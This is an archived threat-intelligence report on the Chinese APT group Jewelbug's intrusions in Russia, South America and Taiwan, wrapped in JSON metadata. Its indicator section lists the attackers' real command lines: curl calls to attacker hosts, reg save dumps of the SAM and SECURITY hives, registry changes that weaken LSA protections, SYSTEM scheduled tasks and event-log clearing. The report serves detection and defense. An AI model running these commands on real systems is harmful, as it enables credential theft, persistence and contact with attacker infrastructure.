{ "id": "8d5fbceb-0781-41df-8b42-5065909c34f3", "created_at": "2026-04-06T00:20:55.84368Z", "updated_at": "2026-04-10T13:11:54.032802Z", "deleted_at": null, "sha1_hash": "85a987395f71a3b1cf9cc204cc9d7fd88712a335", "title": "Jewelbug: Chinese APT Group Widens Reach to Russia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 72432, "plain_text": "Jewelbug: Chinese APT Group Widens Reach to Russia\r\nBy About the Author\r\nArchived: 2026-04-05 17:30:06 UTC\r\nChinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has been highly active in recent months,\r\ntargeting organizations in South America, South Asia, Taiwan and Russia. One of its intrusions was on the\r\nnetwork of a Russian IT service provider and lasted for the first five months of 2025. \r\nAttackers had access to code repository and software build systems that they could potentially leverage to carry\r\nout supply chain attacks targeting the company’s customers in Russia. Notably too, the attackers were exfiltrating\r\ndata to Yandex Cloud. Yandex is a popular service in Russia, so the attackers likely chose to use it in order to\r\navoid raising suspicions. \r\nIn other activity on a large South American government organization in July 2025, Jewelbug deployed a new\r\nbackdoor that appears to be under development by the group.\r\nJewelbug also compromised the network of a Taiwanese company, as well as another IT provider based in South\r\nAsia in recent months. However, its targeting of a Russian company is of particular note as Chinese and Russian\r\nthreat actors have, until recently, rarely been seen to be attacking each other. Jewelbug’s attack is the continuation\r\nof a trend that seems to have begun following Russia’s invasion of Ukraine. \r\nAttack on Russian IT service provider\r\nThe first suspicious activity that occurred on this network was the appearance of a file named 7zup.exe (Command\r\nline: CSIDL_PROFILE\\public\\downloads\\7zup.exe -d -remote up), which is a renamed copy of cdb.exe, a benign\r\nMicrosoft signed binary. CDB is the Microsoft Console Debugger. Use of a renamed version of cbd.exe is a\r\nhallmark of Jewelbug activity. CDB can be used to run shellcode and bypass application whitelisting. It can also\r\nbe used to launch executables, run DLLs and terminate security solutions, making it a powerful tool. Microsoft\r\nrecommends that CDB should be blocked from running by default and whitelisted for specific users only when it’s\r\nexplicitly needed. \r\nOther activity on this network included credential dumping, and persistence and elevation of privileges via\r\nscheduled tasks (schtasks). The attackers also attempted to cover up their activity by clearing Windows Event\r\nLogs. \r\nThe use of Yandex Cloud to exfiltrate data was also a probable attempt by the attackers to remain under the radar\r\nas Yandex is a legitimate and commonly used cloud service in Russia. For this reason, it is unlikely to be blocked\r\nby Russian enterprises, and its use is less likely to raise suspicions. To exfiltrate the victims’ data the attackers\r\nused a malicious sample that they had named “yandex2.exe.” \r\nAs mentioned previously, the attackers were also targeting machines with build systems and code repository\r\nsystems, potentially seeking to leverage access to the source code to carry out a supply chain attack targeting the\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 1 of 7\n\ncompany’s customers in Russia. IT service providers are popular targets for attackers seeking to carry out supply\r\nchain attacks as they often have extensive access to their customers’ systems and may be able to automatically\r\ndeploy updates or software across a large number of networks simultaneously, potentially giving the attackers\r\naccess to, or allowing them to infect, a huge number of organizations at the same time. \r\nIt appears attackers may have been on this network for some time, with the first indication of suspicious activity\r\ndating from January 2025, while the most recent suspicious activity on this network occurred in May 2025.\r\nNew backdoor deployed in South American victim\r\nJewelbug also compromised a network belonging to a South American government department. It appears\r\nJewelbug has been on the network of the department multiple times, or else has maintained persistence on the\r\nnetwork for a long time, because suspicious activity was first seen in this organization in September 2024, with\r\nthe most recent activity seen in July 2025. \r\nIn the September 2024 activity, the attackers attempted to add a new user to the network, as well as attempting to\r\ndeploy a remote access tool to gain access to machines. They also used the legitimate AnyDesk remote\r\nmanagement software, and deployed the 7-zip archive manager, which is often used to pack files before they are\r\nexfiltrated from victim machines. In the more recent activity in July 2025, the attackers used a legitimate\r\nexecutable for DLL sideloading, and the SMBExec tool for likely lateral movement on the network. They also\r\nused scheduled tasks for persistence, and BITSAdmin and the curl tool, probably to exfiltrate data.\r\nAlso in this organization, Jewelbug deployed what appears to be a new backdoor in development by the\r\ngroup. This malware leverages Microsoft Graph API and OneDrive as its command and control (C\u0026C) servers.\r\nThe malware deployed on the victim network appears to have some issues and limitations, perhaps pointing to it\r\nbeing a work in progress, or some inexperience on the part of the developer. However, activity we do see being\r\ncarried out by this malware includes:\r\nObtains a list of files from targeted machines and uploads this to OneDrive\r\nDoes some logging into C:\\ProgramData\\application.ini. Some examples of this logging includes:\r\ninit successfully!\r\nFreeFileInformation Fuc successfully!\r\nC:\\Users\\Public\\Libraries~\r\nCreateDirectory       Successfully!\r\nGet Token successfully!\r\nCreate Folder In OneDrive successfully!\r\nHttpSendRequestWPtr Error Code:0\r\nCreates the directory: C:\\Users\\Public\\Libraries~ and hides it on the victim machine\r\nThe malware also obtains the infected machine’s IP, Windows version, and hostname. In some cases, it also\r\ncollects the machine identifier. It uploads this information to OneDrive.\r\nThe logging done by this malware is of note as it points to this malware possibly being “tested” by the attackers. It\r\nis also notable as it shows that Jewelbug is continuing to develop new malware. The use of Microsoft Graph API\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 2 of 7\n\nand OneDrive for C\u0026C by Jewelbug is also interesting as it minimizes malicious indicators that would be\r\nobservable to traditional security software, making this activity much harder to detect.     \r\nBYOVD technique used to target Taiwanese software company\r\nJewelbug was also on the network of a Taiwanese software company in October and November 2024. Unlike the\r\nlater activity targeting the Russian IT service provider, however, there was no evidence of a software supply chain\r\nattack motivation. The attackers used DLL sideloading to load malware payloads. DLL sideloading is a very\r\npopular tactic among Chinese threat groups. ShadowPad was also deployed on this network. ShadowPad is a\r\npowerful modular backdoor that is exclusively used by Chinese threat actors. The attackers also used the KillAV\r\ntool to disable security software, as well as deploying a publicly available tool called EchoDrv, which permits\r\nabuse of the Kernel read/write vulnerability in the ECHOAC anti-cheat driver. This is likely an example of the\r\nattackers using the bring-your-own-vulnerable-driver (BYOVD) technique as an attempt to avoid their malicious\r\nactivity being detected. They also created scheduled tasks for persistence.\r\nThe attackers leveraged LSASS and Mimikatz for dumping credentials, and Fast Reverse Proxy, which can expose\r\nlocal servers to the public internet, while they also deployed several publicly available tools for discovery and\r\nprivilege escalation. The tools (PrintNotifyPotato, Coerced Potato, and Sweet Potato) are all freely available on\r\nGitHub. The attackers also used a publicly available tunnelling tool called Earthworm in a likely attempt to mask\r\ncommands or data being sent to and from the victim network. The attackers were on this network for\r\napproximately three weeks, indicating some skill at remaining under the radar.\r\nOn the networks of both the Taiwanese software company and the South American government agency, a renamed\r\nversion of the Microsoft Console Debugger (cdb.exe) tool was used. Jewelbug’s use of this tool is notable as it is a\r\nrelatively under the radar tool, despite it having numerous uses that could be beneficial to malicious actors, as\r\ndiscussed above. In one instance we also saw the CDB tool being injected into mspaint.exe. Mspaint has\r\npreviously been documented as being used by Jewelbug to inject malware.\r\nJewelbug’s preference for using cloud services and other legitimate tools in its operations indicates that remaining\r\nunder the radar and establishing a stealthy and persistent presence on victim networks is of utmost importance to\r\nthis group.\r\nPrevious Jewelbug activity\r\nJewelbug is believed to have been active since mid-2023, which was when binaries associated with it were first\r\nuploaded to VirusTotal. As well as the attacks mentioned in this blog, Jewelbug has also been associated with\r\nattacks targeting organizations in Southeast Asia, including a university, telecoms organization and a government\r\nministry. Up to this point the group has been associated only with attacks on organizations in Asia and South\r\nAmerica, there has been no previous documentation of the group targeting organizations in Russia. A blog\r\nreleased by security company Elastic earlier this year did say it had seen Jewelbug attackers using a domain that\r\nmimicked a Russian organization, but they did not identify any victims in Russia as part of that activity.\r\nThat blog also detailed Jewelbug’s use of unique malware called Finaldraft, Pathloader and Guidloader. Finaldraft\r\nis a full-featured remote administration tool with the ability to accept add-on modules that extend functionality. It\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 3 of 7\n\nalso:\r\nHas support for proxying network traffic.\r\nUses third-party Microsoft Graph API for C\u0026C.\r\nSupports both Windows and Linux versions.\r\nPathloader and Guidloader are malware used to download and execute encrypted shellcode in memory. They have\r\nonly been observed in association with Finaldraft.\r\nPalo Alto also published a report about the custom malware used by Jewelbug, though it dubbed the Finaldraft\r\nbackdoor Squidoor. It also noted that Jewelbug gained access to networks of interest by exploiting various\r\nvulnerabilities in Internet Information Services (IIS) servers before deploying webshells on infected servers. It\r\nalso said that as well as using the Microsoft Graph API for C\u0026C communication, the attackers also used DNS and\r\nICMP tunnelling.\r\nPrevious reporting about Jewelbug has also noted the use of the CDB tool, the use of mspaint.exe to inject\r\ncommands, and the wide-ranging use of dual-use and living off the land tools by the attackers as well, all of which\r\nwas also seen in the recent activity observed by the Threat Hunter Team.\r\nAll indications point to Jewelbug being of Chinese origin, with its motivation most likely to be espionage and\r\nmaintaining a long-term and stealthy presence on compromised networks. \r\nChinese threat actors looking in a new direction?\r\nThe most notable element of all this recent Jewelbug activity is the targeting of a Russian IT service provider by\r\nthe Chinese APT group. When it comes to things like the Russia-Ukraine conflict and other geopolitical matters,\r\nChina has traditionally backed, or at least not opposed, Russia, with the two considered to be loosely allied. The\r\ntargeting of a Russian organization by a Chinese APT group shows, however, that Russia is not out-of-bounds\r\nwhen it comes to operations by China-based actors. The fact that there are indications the IT service provider may\r\nhave been targeted for the purposes of a software supply chain attack on the company’s customers in Russia is\r\nalso notable as it means this attack had the potential to give the attackers access to a large number of companies in\r\nthe country, which they could have used for cyber espionage or disruption. \r\nJewelbug’s use of a new backdoor-in-development in this set of activity is also important as it shows that the\r\ngroup is continuing to actively develop its toolset and capabilities. Jewelbug, as a relatively new Chinese APT\r\ngroup, is one to watch as it has the skills to develop its own malware and maintain a long-term and stealthy\r\npresence on networks. \r\nIndicators of compromise (IOCs)\r\nFile indicators\r\n267ae4d7767d9980b3fbbfd5063bd28d5e05d22d64615fe7532d55a6063dfeb3 – cyglaunch.exe – Benign\r\nexecutable used for DLL sideloading\r\ncffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9 – cdb.exe - Benign\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 4 of 7\n\nexecutable Debugging Tools for Windows\r\n010f76b21251eb5d8bc77bcfdb47d5f13009aa985e744b843fc2e35b23fb2a44 - vmwarebase.dll\r\n015e424dc798bc4ef39f5237062d2402f5207fbf912a22ce6fb46ef9e42fd6ca - libgimpbase-2.0-0.dll\r\n0642ada1f7c8b3cc43a1d69d6aa86fc1970e257271811e637b0e4349aa880fa8 - getkey.exe\r\n078a3a2c4f24d8811bb1aa673790c16ad5ea563127af1a5d4a41c893b215c372 - crclient.dll\r\n15eaa601b1bfb8cd7cd5513c692eea4ed4302f6fcbee4722433e0c85388de35d - vmwarebase.dll\r\n259f65bcdd367e6d84a4cba75375744e85fbe58293c88b1ad5a1bee4add63b9d - cygwin1.dll\r\n37e83ffde09a83273a4cea7fe24d3fda63fb342e6a3512de4541d62ab43aadd0 – jli.dll\r\n3f49bd1f3b0999096511757e0fbc2e4e2c18176fd1773f71baf2d7a15dbbcfbf - yandex2.exe\r\n5525c51063d40e12029d9ef4b646e261c853c655b9b2acc74a411428e873a8a1 - crclient.dll\r\n5c396da8b64faf6e29ee38cdf0a4b9a652e01236d2b981c2ca806aa14d94c956 - sccmvnc.exe\r\n5c3f0420c00e6ca123790403b6ed1f53f493357dfdd54ed9460d615d57f6bcd4 - vmwarebase.dll\r\n67bb887a0f34543a32b845029be308f436704207a1964a2a3582f42fe6de4176 - atackersexe.zip\r\n6d4d9b68d02e93e721943a6943cda6544bf4d31d109415774565b544b512ed25 – yandex2.exe\r\n872045fe5bea78e4daac4f0352028060b0fadccfbf0a40b57d405579821850bb - crclient.dll\r\n87ead55ff94b6cd9d80f590793d0dc17d9f5d442b6c827dcfb8db0c078918bd1 - xinput1_3.dll\r\n9f4b046e9f9dbc36b8df011a69490948dce5b9645fc5209b0b3a60dad5a493e6 - crclient.dll\r\na1e45ec8639f55290a5eb47e9f75e6413b12eaa6f9e3834af600e00fe529a637 - vmwarebase.dll\r\nb49e142b89c47757a0afb786bf0e6c11c9548f626c4127d4d16d30e3004bdfb1 - python311.dll\r\nba0dbee9538073fd81953a37218f200988ad91a8380e68118ea83e146e1d986d - python311.dll\r\nbc270539c6a057791fba4793dc7e2d2567070e50ea089cc6fa032b3285576c64 – getkey.exe\r\nbfe1538445e3f74ef7f41699482b40cf6f3b0a084e188f4c4b786b15eeb3601c - mimikatz.x64.exe - Mimikatz\r\ncc87dee890641bd015a04e46a881eb844c774519d55b986fb216c4c2141479e8 - t.exe\r\nd5147787d52636a3c6c2a0c84b351633ad7f45ce4ae5c2007e568f715fec3e49 – g.exe\r\nNetwork indicators\r\napp.blance.workers[.]dev\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 5 of 7\n\ncdn.kindylib[.]info\r\n95.164.5[.]209\r\nCommand lines\r\n7zup.exe -d -remote up\r\nSysteminfo\r\nquser\r\nnetstat -ano\r\ntasklist\r\ncleanmgr\r\ncscript //nologo \"CSIDL_SYSTEM\\winrm.vbs\" get winrm/config\r\ncurl https://app.blance.workers.dev/png\r\ncurl -k https://95.164.5.209/png\r\ncurl https://app.blance.workers.dev/apii\r\nbitsadmin /transfer myJob /download /priority normal https://www.microsoft.com/pt-br/\r\nCSIDL_SYSTEM_DRIVE\\recovery\\index.html\r\ncurl -k https://34.117.217.74/ -o curl.txt\r\nreg save HKLM\\SAM CSIDL_COMMON_PICTURES\\sam.hive\r\nreg save HKLM\\SECURITY CSIDL_COMMON_PICTURES\\security.hive\r\nreg save HKLM\\SYSTEM CSIDL_COMMON_PICTURES\\system.hive\r\nreg add hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v\r\nLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /F\r\nschtasks /create /RL HIGHEST /F /tn \"Microsoft\\Windows\\ApplicationData\\appuriverifierinstalls\" /tr\r\n\"CSIDL_SYSTEM\\oobe\\setup.exe \\ui\" /sc onstart /RU SYSTEM\r\nschtasks /run /tn \"Microsoft\\Windows\\ApplicationData\\appuriverifierinstalls\"\r\nSCCMVNC.exe reconfig /target:10.1.0.110\r\nnet use \\\\[REDACTED]\\ipc$ \u003c?,?\u003e /user:[REDACTED]\r\nwevtutil cl \"Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity\" /q:true\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 6 of 7\n\npowershell -Command \"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$.Id -eq 21} | ForEach-Object { $eventXml =\r\n[xml]$.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress =\r\n$eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -\r\nand $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login \u003c?,?\u003e ' + $loginTime) }}\"\r\nREG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" /v DisableRestrictedAdmin /t REG_DWORD /d\r\n00000000 /f\r\ncmd.exe /Q /c taskkill /pid 37984 /f 1\u003e \\\\127.0.0.1\\ADMIN$\\__1751968474.3717754 2\u003e\u00261\r\ncmd.exe /Q /c vmware-authd.exe run 1\u003e \\\\127.0.0.1\\ADMIN$\\__1751968461.873731 2\u003e\u00261\r\nCSIDL_SYSTEM\\cmd.exe /Q /c echo cd ^\u003e \\\\\u003c11,921B07E0\u003e\\C$\\__output 2^\u003e^\u00261 \u003e\r\nCSIDL_WINDOWS\\oyykocjz.bat \u0026 CSIDL_SYSTEM\\cmd.exe /Q /c CSIDL_WINDOWS\\oyykocjz.bat \u0026 del\r\nCSIDL_WINDOWS\\oyykocjz.bat\r\ncmd.exe /Q /c del CSIDL_SYSTEM_DRIVE\\\"program files\"\\videolan\\vlc\\crashpad.exe 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1751952183.5376222 2\u003e\u00261\r\ncmd.exe /Q /c schtasks /create /tn \"GetEvent\" /tr \"\\\"CSIDL_PROGRAM_FILES\\aker\\aker client\\vmware-authd.exe\" run\" /sc once /st 02:30 /ru SYSTEM /F 1\u003e \\\\127.0.0.1\\ADMIN$\\__1752037991.49069 2\u003e\u00261\r\nSource: https://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nhttps://www.security.com/threat-intelligence/jewelbug-apt-russia\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.security.com/threat-intelligence/jewelbug-apt-russia" ], "report_names": [ "jewelbug-apt-russia" ], "threat_actors": [ { "id": "2f964894-0020-457e-b4e7-65a8c8fe740c", "created_at": "2025-05-29T02:00:03.202897Z", "updated_at": "2026-04-10T02:00:03.858601Z", "deleted_at": null, "main_name": "Earth Alux", "aliases": [], "source_name": "MISPGALAXY:Earth Alux", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fdcb30ba-5fef-4ae2-97bd-f8200f4bd2e5", "created_at": "2025-04-22T02:01:52.35523Z", "updated_at": "2026-04-10T02:00:04.658231Z", "deleted_at": null, "main_name": "Earth Alux", "aliases": [], "source_name": "ETDA:Earth Alux", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Godzilla", "Godzilla Loader", "MASQLOADER", "RAILLOAD", "RAILSETTER", "RSBINJECT", "VARGEIT", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "68a86dfa-1a6d-4254-bd39-a9aa1129fdf5", "created_at": "2025-05-29T02:00:03.198435Z", "updated_at": "2026-04-10T02:00:03.855309Z", "deleted_at": null, "main_name": "REF7707", "aliases": [ "CL-STA-0049", "Jewelbug" ], "source_name": "MISPGALAXY:REF7707", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434855, "ts_updated_at": 1775826714, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.pdf", "text": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.txt", "img": "https://archive.orkl.eu/85a987395f71a3b1cf9cc204cc9d7fd88712a335.jpg" } }